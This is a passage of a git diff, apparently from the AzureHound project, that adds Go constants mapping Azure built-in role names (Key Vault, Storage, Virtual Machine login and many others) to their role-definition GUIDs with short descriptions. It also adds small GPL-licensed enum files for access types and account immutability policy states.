"e4237640-0e3d-4a46-8fda-70bc94856432" + + // Gives you read access to management operations, but does not allow making changes + DeviceUpdateDeploymentsReaderRoleID string = "49e2f5d2-7741-4835-8efa-19e1fe35e47f" + + // Gives you read access to management and content operations, but does not allow making changes + DeviceUpdateReaderRoleID string = "e9dba6fb-3d52-4cf0-bce3-f06ce71b9e0f" + + // Provides permission to backup vault to perform disk backup. + DiskBackupReaderRoleID string = "3e5e47e6-65f7-47ef-90b5-e5dd4d455f24" + + // Used by the StoragePool Resource Provider to manage Disks added to a Disk Pool. + DiskPoolOperatorRoleID string = "60fc6e62-5479-42d4-8bf4-67625fcc2840" + + // Provides permission to backup vault to perform disk restore. + DiskRestoreOperatorRoleID string = "b50d9833-a0cb-478e-945f-707fcc997c13" + + // Provides permission to backup vault to manage disk snapshots. + DiskSnapshotContributorRoleID string = "7efff54f-a5b4-42b5-a1c5-5411624893ce" + + // Lets you manage DocumentDB accounts, but not access to them. + DocumentDBAccountContributorRoleID string = "5bd9cd88-fe45-4216-938b-f97437e15450" + + // Can manage Azure AD Domain Services and related network configurations + DomainServicesContributorRoleID string = "eeaeda52-9324-47f6-8069-5d5bade478b2" + + // Can view Azure AD Domain Services and related network configurations + DomainServicesReaderRoleID string = "361898ef-9ed1-48c2-849c-a832951106bb" + + // Lets you manage elastic san accounts + ElasticSanOwnerRoleID string = "80dcbedb-47ef-405d-95bd-188a1b4ac406" + + // Read Azure Elastic SAN and all sub-resources + ElasticSanReaderRoleID string = "af6a70f8-3c9f-4105-acf1-d719e9fca4ca" + + // Lets you manage a volume group in elastic san account + ElasticSanVolumeGroupOwnerRoleID string = "a8281131-f312-4f34-8d98-ae12be9f0d23" + + // Lets you manage EventGrid operations. + EventGridContributorRoleID string = "1e241071-0855-49ea-94dc-649edcd759de" + + // Allows send access to event grid events. + EventGridDataSenderRoleID string = "d5a91429-5739-47e2-a06b-3470a27159e7" + + // Lets you manage EventGrid event subscription operations. + EventGridEventSubscriptionContributorRoleID string = "428e0ff0-5e57-4d9c-a221-2c70d0e0a443" + + // Lets you read EventGrid event subscriptions. + EventGridEventSubscriptionReaderRoleID string = "2414bbcf-6497-4faf-8c65-045460748405" + + // Experimentation Administrator + ExperimentationAdministratorRoleID string = "7f646f1b-fa08-80eb-a33b-edd6ce5c915c" + + // Experimentation Contributor + ExperimentationContributorRoleID string = "7f646f1b-fa08-80eb-a22b-edd6ce5c915c" + + // Allows for creation, writes and reads to the metric set via the metrics service APIs. + ExperimentationMetricContributorRoleID string = "6188b7c9-7d01-4f99-a59f-c88b630326c0" + + // Experimentation Reader + ExperimentationReaderRoleID string = "49632ef5-d9ac-41f4-b8e7-bbe587fa74a1" + + // Role allows user or principal full access to FHIR Data + FHIRDataContributorRoleID string = "5a1fc7df-4bf1-4951-a576-89034ee01acd" + + // Role allows user or principal to convert data from legacy format to FHIR + FHIRDataConverterRoleID string = "a1705bd2-3a8f-45a5-8683-466fcfd5cc24" + + // Role allows user or principal to read and export FHIR Data + FHIRDataExporterRoleID string = "3db33094-8700-4567-8da5-1501d4e7e843" + + // Role allows user or principal to read and import FHIR Data + FHIRDataImporterRoleID string = "4465e953-8ced-4406-a58e-0f6e3f3b530b" + + // Role allows user or principal to read FHIR Data + FHIRDataReaderRoleID string = "4c8d0bbc-75d3-4935-991f-5f3c56d81508" + + // Role allows user or principal to read and write FHIR Data + FHIRDataWriterRoleID string = "3f88fce4-5892-4214-ae73-ba5294559913" + + // Built-in Grafana admin role + GrafanaAdminRoleID string = "22926164-76b3-42b3-bc55-97df8dab3e41" + + // Built-in Grafana Editor role + GrafanaEditorRoleID string = "a79a5197-3a5c-4973-a920-486035ffd60f" + + // Built-in Grafana Viewer role + GrafanaViewerRoleID string = "60921a7e-fef1-4a43-9b16-a26c52ad4769" + + // Create and manage all aspects of the Enterprise Graph - Ontology, Schema mapping, Conflation and Conversational AI and Ingestions + GraphOwnerRoleID string = "b60367af-1334-4454-b71e-769d9a4f83d9" + + // Lets you read, write Guest Configuration Resource. + GuestConfigurationResourceContributorRoleID string = "088ab73d-1256-47ae-bea9-9de8e7131f31" + + // Lets you read and modify HDInsight cluster configurations. + HDInsightClusterOperatorRoleID string = "61ed4efc-fab3-44fd-b111-e24485cc132a" + + // Can Read, Create, Modify and Delete Domain Services related operations needed for HDInsight Enterprise Security Package + HDInsightDomainServicesContributorRoleID string = "8d8d5a11-05d3-4bda-a417-a08778121c7c" + + // Allows users to edit and delete Hierarchy Settings + HierarchySettingsAdministratorRoleID string = "350f8d15-c687-4448-8ae1-157740a3936d" + + // Can onboard new Hybrid servers to the Hybrid Resource Provider. + HybridServerOnboardingRoleID string = "5d1e5ee4-7c68-4a71-ac8b-0739630a3dfb" + + // Can read, write, delete, and re-onboard Hybrid servers to the Hybrid Resource Provider. + HybridServerResourceAdministratorRoleID string = "48b40c6e-82e0-4eb3-90d5-19e40f49b624" + + // Lets you manage integration service environments, but not access to them. + IntegrationServiceEnvironmentContributorRoleID string = "a41e2c5b-bd99-4a07-88f4-9bf657a760b8" + + // Allows developers to create and update workflows, integration accounts and API connections in integration service environments. + IntegrationServiceEnvironmentDeveloperRoleID string = "c7aa55d3-1abb-444a-a5ca-5e51e485d6ec" + + // Lets you manage Intelligent Systems accounts, but not access to them. + IntelligentSystemsAccountContributorRoleID string = "03a6d094-3444-4b3d-88af-7477090a9e5e" + + // Allows for full access to IoT Hub data plane operations. + IoTHubDataContributorRoleID string = "4fc6c259-987e-4a07-842e-c321cc9d413f" + + // Allows for full read access to IoT Hub data-plane properties + IoTHubDataReaderRoleID string = "b447c946-2db7-41ec-983d-d8bf3b1c77e3" + + // Allows for full access to IoT Hub device registry. + IoTHubRegistryContributorRoleID string = "4ea46cd5-c1b2-4a8e-910b-273211f9ce47" + + // Allows for read and write access to all IoT Hub device and module twins. + IoTHubTwinContributorRoleID string = "494bdba2-168f-4f31-a0a1-191d2f7c028c" + + // Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultAdministratorRoleID string = "00482a5a-887f-4fb3-b363-3b7fe8e74483" + + // Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCertificatesOfficerRoleID string = "a4417e6f-fecd-4de8-b567-7b0420556985" + + // Lets you manage key vaults, but not access to them. + KeyVaultContributorRoleID string = "f25e0fa2-a7c8-4377-a976-54943a77a395" + + // Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoOfficerRoleID string = "14b46e9e-c2b7-41b4-b07b-48a6ebf60603" + + // Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoServiceEncryptionUserRoleID string = "e147488a-f6f5-4113-8e2d-b22465e65bf6" + + // Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoUserRoleID string = "12338af0-0e69-4776-bea7-57ae8d297424" + + // Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultReaderRoleID string = "21090545-7ca7-4776-b22c-e363652d74d2" + + // Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultSecretsOfficerRoleID string = "b86a8fe4-44ce-4948-aee5-eccb2c155cd7" + + // Read secret contents. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultSecretsUserRoleID string = "4633458b-17de-408a-b874-0445c86b69e6" + + // Knowledge Read permission to consume Enterprise Graph Knowledge using entity search and graph query + KnowledgeConsumerRoleID string = "ee361c5d-f7b5-4119-b4b6-892157c8f64c" + + // Role definition to authorize any user/service to create connectedClusters resource + KubernetesClusterAzureArcOnboardingRoleID string = "34e09817-6cbe-4d01-b1a2-e0eac5743d41" + + // Can create, update, get, list and delete Kubernetes Extensions, and get extension async operations + KubernetesExtensionContributorRoleID string = "85cb6faf-e071-4c9b-8136-154b5a04f717" + + // The lab assistant role + LabAssistantRoleID string = "ce40b423-cede-4313-a93f-9b28290b72e1" + + // The lab contributor role + LabContributorRoleID string = "5daaa2af-1fe8-407c-9122-bba179798270" + + // Lets you create new labs under your Azure Lab Accounts. + LabCreatorRoleID string = "b97fb8bc-a8b2-4522-a38b-dd33c7e65ead" + + // The lab operator role + LabOperatorRoleID string = "a36e6959-b6be-4b12-8e9f-ef4b474d304d" + + // The lab services contributor role + LabServicesContributorRoleID string = "f69b8690-cc87-41d6-b77a-a4bc3c0a966f" + + // The lab services reader role + LabServicesReaderRoleID string = "2a5c394f-5eb7-4d4f-9c8e-e8eae39faebc" + + // View, create, update, delete and execute load tests. View and list load test resources but can not make any changes. + LoadTestContributorRoleID string = "749a398d-560b-491b-bb21-08924219302e" + + // Execute all operations on load test resources and load tests + LoadTestOwnerRoleID string = "45bb0b16-2f0c-4e78-afaa-a07599b003f6" + + // View and list all load tests and load test resources but can not make any changes + LoadTestReaderRoleID string = "3ae3fb29-0000-4ccd-bf80-542e7b26e081" + + // Log Analytics Contributor can read all monitoring data and edit monitoring settings. Editing monitoring settings includes adding the VM extension to VMs; reading storage account keys to be able to configure collection of logs from Azure Storage; adding solutions; and configuring Azure diagnostics on all Azure resources. + LogAnalyticsContributorRoleID string = "92aaf0da-9dab-42b6-94a3-d43ce8d16293" + + // Log Analytics Reader can view and search all monitoring data as well as and view monitoring settings, including viewing the configuration of Azure diagnostics on all Azure resources. + LogAnalyticsReaderRoleID string = "73c42c96-874c-492b-b04d-ab87d138a893" + + // Lets you manage logic app, but not access to them. + LogicAppContributorRoleID string = "87a39d53-fc1b-424a-814c-f7e04687dc9e" + + // Lets you read, enable and disable logic app. + LogicAppOperatorRoleID string = "515c2055-d9d4-4321-b1b9-bd0c9a0f79fe" + + // Allows for creating managed application resources. + ManagedApplicationContributorRoleID string = "641177b8-a67a-45b9-a033-47bc880bb21e" + + // Lets you read and perform actions on Managed Application resources + ManagedApplicationOperatorRoleID string = "c7393b34-138c-406f-901b-d8cf2b17e6ae" + + // Lets you read resources in a managed app and request JIT access. + ManagedApplicationsReaderRoleID string = "b9331d33-8a36-4f8c-b097-4f54124fdb44" + + // Lets you manage managed HSM pools, but not access to them. + ManagedHSMcontributorRoleID string = "18500a29-7fe2-46b2-a342-b16a415e101d" + + // Create, Read, Update, and Delete User Assigned Identity + ManagedIdentityContributorRoleID string = "e40ec5ca-96e0-45a2-b4ff-59039f2c2b59" + + // Read and Assign User Assigned Identity + ManagedIdentityOperatorRoleID string = "f1a07417-d97a-45cb-824c-7a7467783830" + + // Managed Services Registration Assignment Delete Role allows the managing tenant users to delete the registration assignment assigned to their tenant. + ManagedServicesRegistrationassignmentDeleteRoleID string = "91c1777a-f3dc-4fae-b103-61d183457e46" + + // Management Group Contributor Role + ManagementGroupContributorRoleID string = "5d58bcaf-24a5-4b20-bdb6-eed9f69fbe4c" + + // Management Group Reader Role + ManagementGroupReaderRoleID string = "ac63b705-f282-497d-ac71-919bf39d939d" + + // Marketplace Admin grants full access to manage Private Azure Marketplace, including read and take action for private marketplace notifications, but does not allow to assign Marketplace Admin role to others + MarketplaceAdminRoleID string = "dd920d6d-f481-47f1-b461-f338c46b2d9f" + + // Create, read, modify, and delete Media Services accounts; read-only access to other Media Services resources. + MediaServicesAccountAdministratorRoleID string = "054126f8-9a2b-4f1c-a9ad-eca461f08466" + + // Create, read, modify, and delete Live Events, Assets, Asset Filters, and Streaming Locators; read-only access to other Media Services resources. + MediaServicesLiveEventsAdministratorRoleID string = "532bc159-b25e-42c0-969e-a1d439f60d77" + + // Create, read, modify, and delete Assets, Asset Filters, Streaming Locators, and Jobs; read-only access to other Media Services resources. + MediaServicesMediaOperatorRoleID string = "e4395492-1534-4db2-bedf-88c14621589c" + + // Create, read, modify, and delete Account Filters, Streaming Policies, Content Key Policies, and Transforms; read-only access to other Media Services resources. Cannot create Jobs, Assets or Streaming resources. + MediaServicesPolicyAdministratorRoleID string = "c4bba371-dacd-4a26-b320-7250bca963ae" + + // Create, read, modify, and delete Streaming Endpoints; read-only access to other Media Services resources. + MediaServicesStreamingEndpointsAdministratorRoleID string = "99dba123-b5fe-44d5-874c-ced7199a5804" + + // Microsoft Sentinel Automation Contributor + MicrosoftSentinelAutomationContributorRoleID string = "f4c81013-99ee-4d62-a7ee-b3f1f648599a" + + // Microsoft Sentinel Contributor + MicrosoftSentinelContributorRoleID string = "ab8e14d6-4a74-4a29-9ba8-549422addade" + + // Microsoft Sentinel Reader + MicrosoftSentinelReaderRoleID string = "8d289c81-5878-46d4-8554-54e1e3d8b5cb" + + // Microsoft Sentinel Responder + MicrosoftSentinelResponderRoleID string = "3e150937-b8fe-4cfb-8069-0eaf05ecd056" + + // Microsoft.Kubernetes connected cluster role. + MicrosoftKubernetesConnectedClusterRoleID string = "5548b2cf-c94c-4228-90ba-30851930a12f" + + // Can read and update Monitored Objects and associated Data Collection Rules. + MonitoredObjectsContributorRoleID string = "56be40e2-4db1-4ccf-93c3-7e44c597135b" + + // Can read all monitoring data and update monitoring settings. + MonitoringContributorRoleID string = "749f88d5-cbae-40b8-bcfc-e573ddc772fa" + + // Enables publishing metrics against Azure resources + MonitoringMetricsPublisherRoleID string = "3913510d-42f4-4e42-8a64-420c390055eb" + + // Can read all monitoring data. + MonitoringReaderRoleID string = "43d0d8ad-25c7-4714-9337-8ba259a9fe05" + + // Lets you manage networks, but not access to them. + NetworkContributorRoleID string = "4d97b98b-1d4f-4787-a291-c67834d212e7" + + // Lets you manage New Relic Application Performance Management accounts and applications, but not access to them. + NewRelicAPMAccountContributorRoleID string = "5d28c62d-5b37-4476-8438-e587778df237" + + // Provides user with ingestion capabilities for an object anchors account. + ObjectAnchorsAccountOwnerRoleID string = "ca0835dd-bacc-42dd-8ed2-ed5e7230d15b" + + // Lets you read ingestion jobs for an object anchors account. + ObjectAnchorsAccountReaderRoleID string = "4a167cdf-cb95-4554-9203-2347fe489bd9" + + // Provides user with ingestion capabilities for Azure Object Understanding. + ObjectUnderstandingAccountOwnerRoleID string = "4dd61c23-6743-42fe-a388-d8bdd41cb745" + + // Lets you read ingestion jobs for an object understanding account. + ObjectUnderstandingAccountReaderRoleID string = "d18777c0-1514-4662-8490-608db7d334b6" + + // Grants full access to manage all resources, including the ability to assign roles in Azure RBAC. + OwnerRoleID string = "8e3af657-a8ff-443c-a75c-2fe8c4bcb635" + + // Provides contributor access to PlayFab resources + PlayFabContributorRoleID string = "0c8b84dc-067c-4039-9615-fa1a4b77c726" + + // Provides read access to PlayFab resources + PlayFabReaderRoleID string = "a9a19cc5-31f4-447c-901f-56c0bb18fcaf" + + // Allows read access to resource policies and write access to resource component policy events. + PolicyInsightsDataWriterRoleID string = "66bb4e9e-b016-4a94-8249-4c0511c2be84" + + // The user has access to perform administrative actions on all PowerApps resources within the tenant. + PowerAppsAdministratorRoleID string = "53be45b2-ad40-43ab-bc1f-2c962ac99ded" + + // PowerAppsReadersWithReshare can use the resource and re-share it with other users, but cannot edit the resource or re-share it with edit permissions. + PowerAppsReaderWithReshareRoleID string = "6877c72c-edd3-4048-9b4b-cf8e514477b0" + + // Lets you manage private DNS zone resources, but not the virtual networks they are linked to. + PrivateDNSZoneContributorRoleID string = "b12aa53e-6015-4669-85d0-8515ebb3ae7f" + + // The Microsoft.ProjectBabylon data curator can create, read, modify and delete catalog data objects and establish relationships between objects. This role is in preview and subject to change. + ProjectBabylonDataCuratorRoleID string = "9ef4ef9c-a049-46b0-82ab-dd8ac094c889" + + // The Microsoft.ProjectBabylon data reader can read catalog data objects. This role is in preview and subject to change. + ProjectBabylonDataReaderRoleID string = "c8d896ba-346d-4f50-bc1d-7d1c84130446" + + // The Microsoft.ProjectBabylon data source administrator can manage data sources and data scans. This role is in preview and subject to change. + ProjectBabylonDataSourceAdministratorRoleID string = "05b7651b-dc44-475e-b74d-df3db49fae0f" + + // Deprecated role. + Purview1DeprecatedRoleID string = "8a3c2885-9b38-4fd2-9d99-91af537c1347" + + // Deprecated role. + Purview2DeprecatedRoleID string = "200bba9e-f0c8-430f-892b-6f0794863803" + + // Deprecated role. + Purview3DeprecatedRoleID string = "ff100721-1b9d-43d8-af52-42b69c1272db" + + // Read and create quota requests, get quota request status, and create support tickets. + QuotaRequestOperatorRoleID string = "0e5f05e5-9ab9-446b-b98d-1e2157c94125" + + // View all resources, but does not allow you to make any changes. + ReaderRoleID string = "acdd72a7-3385-48ef-bd42-f606fba81ae7" + + // Lets you view everything but will not let you delete or create a storage account or contained resource. It will also allow read/write access to all data contained in a storage account via access to storage account keys. + ReaderandDataAccessRoleID string = "c12c1c16-33a1-487b-954d-41c89c60f349" + + // Lets you manage Redis caches, but not access to them. + RedisCacheContributorRoleID string = "e0f68234-74aa-48ed-b826-c38b57376e17" + + // Provides user with conversion, manage session, rendering and diagnostics capabilities for Azure Remote Rendering + RemoteRenderingAdministratorRoleID string = "3df8b902-2a6f-47c7-8cc5-360e9b272a7e" + + // Provides user with manage session, rendering and diagnostics capabilities for Azure Remote Rendering. + RemoteRenderingClientRoleID string = "d39065c4-c120-43c9-ab0a-63eed9795f0a" + + // Lets you purchase reservations + ReservationPurchaserRoleID string = "f7b75c60-3036-4b75-91c3-6b41c27c1689" + + // Lets one read and manage all the reservations in a tenant + ReservationsAdministratorRoleID string = "a8889054-8d42-49c9-bc1c-52486c10e7cd" + + // Lets one read all the reservations in a tenant + ReservationsReaderRoleID string = "582fc458-8989-419f-a480-75249bc5db7e" + + // Users with rights to create/modify resource policy, create support ticket and read resources/hierarchy. + ResourcePolicyContributorRoleID string = "36243c78-bf99-498c-9df9-86d9f8d28608" + + // Lets you manage SQL databases, but not access to them. Also, you can't manage their security-related policies or their parent SQL servers. + SQLDBContributorRoleID string = "9b7fa17d-e63e-47b0-bb0a-15c516ac86ec" + + // Lets you manage SQL Managed Instances and required network configuration, but can’t give access to others. + SQLManagedInstanceContributorRoleID string = "4939a1f6-9ae0-4e48-a1e0-f2cbe897382d" + + // Lets you manage the security-related policies of SQL servers and databases, but not access to them. + SQLSecurityManagerRoleID string = "056cd41c-7e88-42e1-933e-88ba6a50c9c3" + + // Lets you manage SQL servers and databases, but not access to them, and not their security -related policies. + SQLServerContributorRoleID string = "6d8ee4ec-f05a-4a1d-8b00-a9b17e38b437" + + // Provides access to manage maintenance configurations with maintenance scope InGuestPatch and corresponding configuration assignments + ScheduledPatchingContributorRoleID string = "cd08ab90-6b14-449c-ad9a-8f8e549482c6" + + // Lets you manage Scheduler job collections, but not access to them. + SchedulerJobCollectionsContributorRoleID string = "188a0f2f-5c9e-469b-ae67-2aa5ce574b94" + + // Read, write, and delete Schema Registry groups and schemas. + SchemaRegistryContributorRoleID string = "5dffeca3-4936-4216-b2bc-10343a5abb25" + + // Read and list Schema Registry groups and schemas. + SchemaRegistryReaderRoleID string = "2c56ea50-c6b3-40a6-83c0-9d98858bc7d2" + + // Grants full access to Azure Cognitive Search index data. + SearchIndexDataContributorRoleID string = "8ebe5a00-799e-43f5-93ac-243d3dce84a7" + + // Grants read access to Azure Cognitive Search index data. + SearchIndexDataReaderRoleID string = "1407120a-92aa-4202-b7e9-c0e197c71c8f" + + // Lets you manage Search services, but not access to them. + SearchServiceContributorRoleID string = "7ca78c08-252a-4471-8644-bb5ff32d4ba0" + + // Security Admin Role + SecurityAdminRoleID string = "fb1c8493-542b-48eb-b624-b4c8fea62acd" + + // Lets you push assessments to Security Center + SecurityAssessmentContributorRoleID string = "612c2aa1-cb24-443b-ac28-3ab7272de6f5" + + // Allowed to publish and modify platforms, workflows and toolsets to Security Detonation Chamber + SecurityDetonationChamberPublisherRoleID string = "352470b3-6a9c-4686-b503-35deb827e500" + + // Allowed to query submission info and files from Security Detonation Chamber + SecurityDetonationChamberReaderRoleID string = "28241645-39f8-410b-ad48-87863e2951d5" + + // Allowed to create and manage submissions to Security Detonation Chamber + SecurityDetonationChamberSubmissionManagerRoleID string = "a37b566d-3efa-4beb-a2f2-698963fa42ce" + + // Allowed to create submissions to Security Detonation Chamber + SecurityDetonationChamberSubmitterRoleID string = "0b555d9b-b4a7-4f43-b330-627f0e5be8f0" + + // This is a legacy role. Please use Security Administrator instead + SecurityManagerLegacyRoleID string = "e3d13bf0-dd5a-482e-ba6b-9b8433878d10" + + // Security Reader Role + SecurityReaderARMRoleID string = "39bc4728-0917-49c7-9d2c-d95423bc2eb4" + + // Services Hub Operator allows you to perform all read, write, and deletion operations related to Services Hub Connectors. + ServicesHubOperatorRoleID string = "82200a5b-e217-47a5-b665-6d8765ee745b" + + // Read SignalR Service Access Keys + SignalRAccessKeyReaderRoleID string = "04165923-9d83-45d5-8227-78b77b0a687e" + + // Lets your app server access SignalR Service with AAD auth options. + SignalRAppServerRoleID string = "420fcaa2-552c-430f-98ca-3264be4806c7" + + // Full access to Azure SignalR Service REST APIs + SignalRRESTAPIOwnerRoleID string = "fd53cd77-2268-407a-8f46-7e7863d0f521" + + // Read-only access to Azure SignalR Service REST APIs + SignalRRESTAPIReaderRoleID string = "ddde6b66-c0df-4114-a159-3618637b3035" + + // Full access to Azure SignalR Service REST APIs + SignalRServiceOwnerRoleID string = "7e4f1700-ea5a-4f59-8f37-079cfe29dce3" + + // Create, Read, Update, and Delete SignalR service resources + SignalRWebPubSubContributorRoleID string = "8cf5e20a-e4b2-4e9d-b3a1-5ceb692c2761" + + // Lets you manage Site Recovery service except vault creation and role assignment + SiteRecoveryContributorRoleID string = "6670b86e-a3f7-4917-ac9b-5d6ab1be4567" + + // Lets you failover and failback but not perform other Site Recovery management operations + SiteRecoveryOperatorRoleID string = "494ae006-db33-4328-bf46-533a6560a3ca" + + // Lets you view Site Recovery status but not perform other management operations + SiteRecoveryReaderRoleID string = "dbaa88c4-0c30-4179-9fb3-46319faa6149" + + // Lets you manage spatial anchors in your account, but not delete them + SpatialAnchorsAccountContributorRoleID string = "8bbe83f1-e2a6-4df7-8cb4-4e04d4e5c827" + + // Lets you manage spatial anchors in your account, including deleting them + SpatialAnchorsAccountOwnerRoleID string = "70bbe301-9835-447d-afdd-19eb3167307c" + + // Lets you locate and read properties of spatial anchors in your account + SpatialAnchorsAccountReaderRoleID string = "5d51204f-eb77-4b1c-b86a-2ec626c49413" + + // Lets you perform backup and restore operations using Azure Backup on the storage account. + StorageAccountBackupContributorRoleID string = "e5e2a7ff-d759-4cd2-bb51-3152d37e2eb1" + + // Lets you manage storage accounts, including accessing storage account keys which provide full access to storage account data. + StorageAccountContributorRoleID string = "17d1049b-9a84-46fb-8f53-869881c3d3ab" + + // Storage Account Key Operators are allowed to list and regenerate keys on Storage Accounts + StorageAccountKeyOperatorServiceRoleID string = "81a9662b-bebf-436f-a333-f67b29880f12" + + // Allows for read, write and delete access to Azure Storage blob containers and data + StorageBlobDataContributorRoleID string = "ba92f5b4-2d11-453d-a403-e96b0029c9fe" + + // Allows for full access to Azure Storage blob containers and data, including assigning POSIX access control. + StorageBlobDataOwnerRoleID string = "b7e6dc6d-f1e8-4753-8033-0f276bb0955b" + + // Allows for read access to Azure Storage blob containers and data + StorageBlobDataReaderRoleID string = "2a2b9908-6ea1-4ae2-8e65-a410df84e7d1" + + // Allows for generation of a user delegation key which can be used to sign SAS tokens + StorageBlobDelegatorRoleID string = "db58b8e5-c6ad-4a2a-8342-4190687cbf4a" + + // Allows for read, write, and delete access in Azure Storage file shares over SMB + StorageFileDataSMBShareContributorRoleID string = "0c867c2a-1d8c-454a-a3db-ab2ea1bdc8bb" + + // Allows for read, write, delete and modify NTFS permission access in Azure Storage file shares over SMB + StorageFileDataSMBShareElevatedContributorRoleID string = "a7264617-510b-434b-a828-9731dc254ea7" + + // Allows for read access to Azure File Share over SMB + StorageFileDataSMBShareReaderRoleID string = "aba4ae5f-2193-4029-9191-0cb91df5e314" + + // Allows for read, write, and delete access to Azure Storage queues and queue messages + StorageQueueDataContributorRoleID string = "974c5e8b-45b9-4653-ba55-5f855dd0fb88" + + // Allows for peek, receive, and delete access to Azure Storage queue messages + StorageQueueDataMessageProcessorRoleID string = "8a0f0c08-91a1-4084-bc3d-661d67233fed" + + // Allows for sending of Azure Storage queue messages + StorageQueueDataMessageSenderRoleID string = "c6a89b2d-59bc-44d0-9896-0f6e12d7b80a" + + // Allows for read access to Azure Storage queues and queue messages + StorageQueueDataReaderRoleID string = "19e7f393-937e-4f77-808e-94535e297925" + + // Allows for read, write and delete access to Azure Storage tables and entities + StorageTableDataContributorRoleID string = "0a9a7e1f-b9d0-4cc4-a60d-0319b160aaa3" + + // Allows for read access to Azure Storage tables and entities + StorageTableDataReaderRoleID string = "76199698-9eea-4c19-bc75-cec21354c6b6" + + // Lets you perform query testing without creating a stream analytics job first + StreamAnalyticsQueryTesterRoleID string = "1ec5b3c1-b17e-4e25-8312-2acb3c3c5abf" + + // Lets you create and manage Support requests + SupportRequestContributorRoleID string = "cfd33db0-3dd1-45e3-aa9d-cdbdf3b6f24e" + + // Lets you manage tags on entities, without providing access to the entities themselves. + TagContributorRoleID string = "4a9ae827-6dc8-4573-8ac7-8239d42aa03f" + + // Let you view and download packages and test results. + TestBaseReaderRoleID string = "15e0f5a1-3450-4248-8e25-e2afe88a9e85" + + // Lets you manage Traffic Manager profiles, but does not let you control who has access to them. + TrafficManagerContributorRoleID string = "a4b10055-b0c7-44c2-b00f-c7b5b3550cf7" + + // Lets you manage user access to Azure resources. + UserAccessAdminRoleID string = "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" + + // Role that provides access to disk snapshot for security analysis. + VMScannerOperatorRoleID string = "d24ecba3-c1f4-40fa-a7bb-4588a071e8fd" + + // Has access to view and search through all video's insights and transcription in the Video Indexer portal. No access to model customization, embedding of widget, downloading videos, or sharing the account. + VideoIndexerRestrictedViewerRoleID string = "a2c4a527-7dc0-4ee3-897b-403ade70fafb" + + // View Virtual Machines in the portal and login as administrator + VirtualMachineAdministratorLoginRoleID string = "1c0163c0-47e6-4577-8991-ea5c82e286e4" + + // Deprecated. Use VirtualMachineAdministratorLoginRoleID instead. + AdminLoginRoleID string = "1c0163c0-47e6-4577-8991-ea5c82e286e4" + + // Lets you manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to. + VirtualMachineContributorRoleID string = "9980e02c-c2be-4d73-94e8-173b1dc7cf3c" + + // View Virtual Machines in the portal and login as a local user configured on the arc server + VirtualMachineLocalUserLoginRoleID string = "602da2ba-a5c2-41da-b01d-5360126ab525" + + // View Virtual Machines in the portal and login as a regular user. + VirtualMachineUserLoginRoleID string = "fb879df8-f326-4884-b1cf-06f3ad86be52" + + // Lets you manage the web plans for websites, but not access to them. + WebPlanContributorRoleID string = "2cc479cb-7b4d-49a8-b449-8c00fd0f0a4b" + + // Full access to Azure Web PubSub Service REST APIs + WebPubSubServiceOwnerRoleID string = "12cf5a90-567b-43ae-8102-96cf46c7d9b4" + + // Read-only access to Azure Web PubSub Service REST APIs + WebPubSubServiceReaderRoleID string = "bfb1c7d2-fb1a-466b-b2ba-aee63b92deaf" + + // Lets you manage websites (not web plans), but not access to them. + WebsiteContributorRoleID string = "de139f84-1756-47ae-9be6-808fbbe84772" + + // Let's you manage the OS of your resource via Windows Admin Center as an administrator. + WindowsAdminCenterAdministratorLoginRoleID string = "a6333a3e-0164-44c3-b281-7a577aff287f" + + // Can save shared workbooks. + WorkbookContributorRoleID string = "e8ddcd69-c73f-4f9f-9844-4100522f16ad" + + // Can read workbooks. + WorkbookReaderRoleID string = "b279062a-9be3-42a0-92ae-8b3cf002ec4d" + + // WorkloadBuilder Migration Agent Role. + WorkloadBuilderMigrationAgentRoleID string = "d17ce0a2-0697-43bc-aac5-9113337ab61c" +) diff --git a/enums/accesstype.go b/enums/accesstype.go new file mode 100644 index 0000000..a362387 --- /dev/null +++ b/enums/accesstype.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AccessType string + +const ( + AccessTypeScope AccessType = "Scope" + AccessTypeRole AccessType = "Role" +) diff --git a/enums/account_immutability_policy_state.go b/enums/account_immutability_policy_state.go new file mode 100644 index 0000000..29c437a --- /dev/null +++ b/enums/account_immutability_policy_state.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type AccountImmutabilityPolicyState string + +const ( + DisabledState AccountImmutabilityPolicyState = "Disabled" + LockedState AccountImmutabilityPolicyState = "Locked" + UnlockedState AccountImmutabilityPolicyState = "Unlocked" +) diff --git a/enums/agegroup.go b/enums/agegroup.go new file mode 100644 index 0000000..8bdd519 --- /dev/null +++ b/enums/agegroup.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. 